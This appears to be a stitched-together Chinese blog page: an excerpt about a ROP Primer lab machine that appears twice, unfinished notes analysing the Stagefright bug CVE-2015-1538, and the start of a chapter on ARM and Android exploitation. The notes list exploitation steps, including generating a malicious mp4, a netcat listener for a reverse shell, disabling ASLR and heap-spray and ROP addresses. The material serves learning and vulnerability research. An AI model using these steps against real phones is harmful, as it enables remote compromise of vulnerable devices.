ROP Primer靶机实战练习
1、Primer靶机下载地址: https://pan.baidu.com/s/1rYDOK-EDZDEfEYk2_IfRMg
2、靶机开放了80、22、8888端口,访问80端口,是该ROP的一些提示:

给出了ssh的账号密码为:level0 : warmup
[详细阅读…]1、Primer靶机下载地址: https://pan.baidu.com/s/1rYDOK-EDZDEfEYk2_IfRMg
2、靶机开放了80、22、8888端口,访问80端口,是该ROP的一些提示:
给出了ssh的账号密码为:level0 : warmup
[详细阅读…]漏洞CVE-2015-1538分析笔记:
1.使用网上的python脚本生成mp4文件(exp.py -c x.x.x.x -p 3523)
2.开启监听:nc -l -v -p 3523
3.在含有漏洞的手机上运行mp4文件,发现并未反弹端口,仅仅是崩溃
4.查看DDMS,确认是setSampleToChunkParams(long,long,unsigned int)+137处
5.先关闭ASLR(echo 0 > /proc/sys/kernel/randomize_va_space)
6.运行android_server,adb forward tcp:23946 tcp:23946
7.IDA attach media server,定位崩溃处
8.spray address(sp_addr)的位置,这个地址其实是frameworks/av/media/libstagefright/MPEG4Extractor.cpp中mDataSource所在的位置,因为mDataSource在堆中,所在的内存地址不是固定的,但是它总会落在一定的范围内。
9.newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs 这个地址应为libc.so中的ROP起始地址(即system的起始地址)
【后续有进展再补充】
在本章中,我们将了解 ARM 处理器的基础知识,和 ARM 世界中存在的不同类型的漏洞。 我们甚至会继续利用这些漏洞,以便对整个场景有个清晰地了解。 此外,我们将研究不同的 Android root 攻击和它们在漏洞利用中的基本漏洞。 考虑到目前大多数 Android 智能手机都使用基于 ARM 的处理器,对于渗透测试人员来说,了解 ARM 及其附带的安全风险至关重要。
ARM 是基于精简指令集(RISC)的架构,这意味着其指令比基于复杂指令集(CISC)的机器少得多。 ARM 处理器几乎遍布我们周围的所有设备,如智能手机,电视,电子书阅读器和更多的嵌入式设备。
ARM 总共有 16 个可见的通用寄存器,为 R0-R15。 在这 16 个中,有 5 个用于特殊目的。 以下是这五个寄存器及其名称:
下面的图展示了 ARM 架构: